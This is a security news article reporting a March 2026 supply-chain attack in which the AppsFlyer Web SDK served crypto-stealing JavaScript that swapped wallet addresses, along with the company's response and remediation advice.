Security Breach: AppsFlyer Web SDK Compromised by Crypto-Stealing JavaScript Malware

Crypto Stealer Malware Discovered in AppsFlyer Web SDK Supply-Chain Attack

A recent incident revealed that the AppsFlyer Web SDK was compromised with malicious code aimed at stealing cryptocurrency in a supply-chain attack.

The malicious payload inserted into the SDK could intercept cryptocurrency wallet addresses entered on websites, replacing them with attacker-controlled addresses to siphon off funds to the threat actor.

AppsFlyer’s SDK is widely utilized by thousands of applications for marketing analytics, impacting a significant number of end users.

According to AppsFlyer, their SDK platform is utilized by 15,000 businesses globally across over 100,000 mobile and web applications, making it one of the prominent “mobile measurement partner” (MMP) SDKs for tracking marketing campaign attribution and in-app events.

Profero researchers identified the suspected compromise, confirming the presence of obfuscated attacker-controlled JavaScript being delivered to users visiting websites and applications utilizing the AppsFlyer SDK.

While AppsFlyer has acknowledged a domain availability issue on March 10, 2026, they have not confirmed any further incidents related to the compromise.

On March 9, Profero discovered a malicious payload served by the SDK from the official domain ‘websdk.appsflyer.com,’ which was also reported by multiple users.

The incident underscores how threat actors can exploit trust in widely deployed third-party SDKs to impact downstream websites, applications, and end users.

The injected JavaScript aimed to maintain normal SDK functionality while surreptitiously loading and decoding obfuscated strings at runtime and intercepting browser network requests.

The malware specifically targeted cryptocurrency wallet input activity, replacing legitimate wallet addresses with the attacker’s address and exfiltrating the original wallet details and associated metadata.

Various cryptocurrencies such as Bitcoin, Ethereum, Solana, Ripple, and TRON were among the targeted assets, encompassing a broad spectrum of mainstream cryptocurrency transactions.

The exposure window for the compromise is estimated to be between March 9, 22:45 UTC, and March 11, with uncertainty regarding any impact beyond that timeframe.

AppsFlyer confirmed unauthorized code being delivered through the SDK, emphasizing that the mobile SDK remained unaffected, and no evidence of customer data access was identified.

The company has resolved the issue and communicated directly with customers regarding the incident.

An ongoing investigation involving external forensic experts is being conducted by AppsFlyer, with further updates to be shared upon completion.

Organizations utilizing the SDK are advised to review telemetry logs for suspicious API requests from websdk.appsflyer.com, revert to known-good versions of the SDK, and investigate potential compromises.

Earlier this year, AppsFlyer was implicated in a cybersecurity incident involving the ShinyHunters threat group, leveraging the SDK for a supply-chain breach at Match Group, compromising over 10 million records of Hinge, Match.com, and OkCupid users.